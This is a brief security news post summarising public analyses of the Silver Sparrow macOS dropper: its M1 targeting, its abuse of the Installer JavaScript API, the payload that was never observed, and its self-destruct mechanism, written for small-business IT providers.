top of page
news602

Silver Sparrow: MacOS target

Updated: May 6, 2021

Reports on "a new malware threat dropper known as Silver Sparrow emerged earlier this month, targeting MacOS. In response, a Silver Sparrow Detection and Prevention script is now available" from Datto for its partners. A dropper is used in an attack to establish persistence on a device and deliver a payload, the component that causes harm to the system. From this analysis, there are four interesting details about this attack that should raise the profile of this activity as well as your guard to protect your small and medium business (SMB) clients. Dan Garcia reported and outlined these "details about the attacks below.


Targeting the Apply M1 Architecture

Launched in November, the Apple M1 architecture marked the departure from the Intel-based processors that Apple has relied on for desktop and laptop product lines. Up to this point in time, there hasn’t been a variant that has targeted the new ARM64 based architecture from Apple. The teams at Red Canary and Malwarebytes who made the discovery uncovered two variants of Silver Sparrow. While the first variant was Intel x86_64 only, the second sample included both x86_64 and ARM64 architectures in the PKG. This should be a clear signal to the MSP community that actors are continuing to target macOS and evolving their techniques.


Use of the macOS Installer Javascript API

Existing malware techniques leverage preinstall and postinstall scripts as part of the installer which detection engines can identify the process execution patterns to take action. Silver Sparrow leverages the trusted macOS Installer process to execute malicious JavaScript commands buried in an XML file, included in the package. This provides the malicious code additional cover from existing detection capabilities, and those that make assumptions on trusted operating system processes, thus making this challenging for many next-gen engines to identify as malicious. This is a clear move to look more like a normal or trusted package install and remove a detection opportunity for defenders.


The Missing Payload

Through the analysis conducted, neither team had observed the most impactful part of any dropper: the payload. Payloads are what we generally hear about in the news and in our response efforts (these include RYUK and Trickbot) have consequential results. The Malwarebytes team indicates that of the hosts that the dropper was identified on, they all seem to lack the payload. Furthermore, within the execution scripts, there were coded messages using the standard “Hello World”, which lends itself to the idea that Silver Sparrow is still under development by an actor. The evidence strongly suggests that this dropper is in its early days and that we will likely hear more about Silver Sparrow in the future.


Self Destruction

We can all appreciate someone cleaning up after themselves, but the guest you want stopping by and cleaning up any traces isn’t Silver Sparrow. While the dropper is meant to be persistent, there is a kill switch of sorts built into Silver Sparrow to force the removal of the components with persistent mechanisms installed. This is accomplished through monitoring for the presence of a file. This technique allows its operators, if desired, to drop the payload and exit from the system without a trace."


1 view0 comments

Comments


bottom of page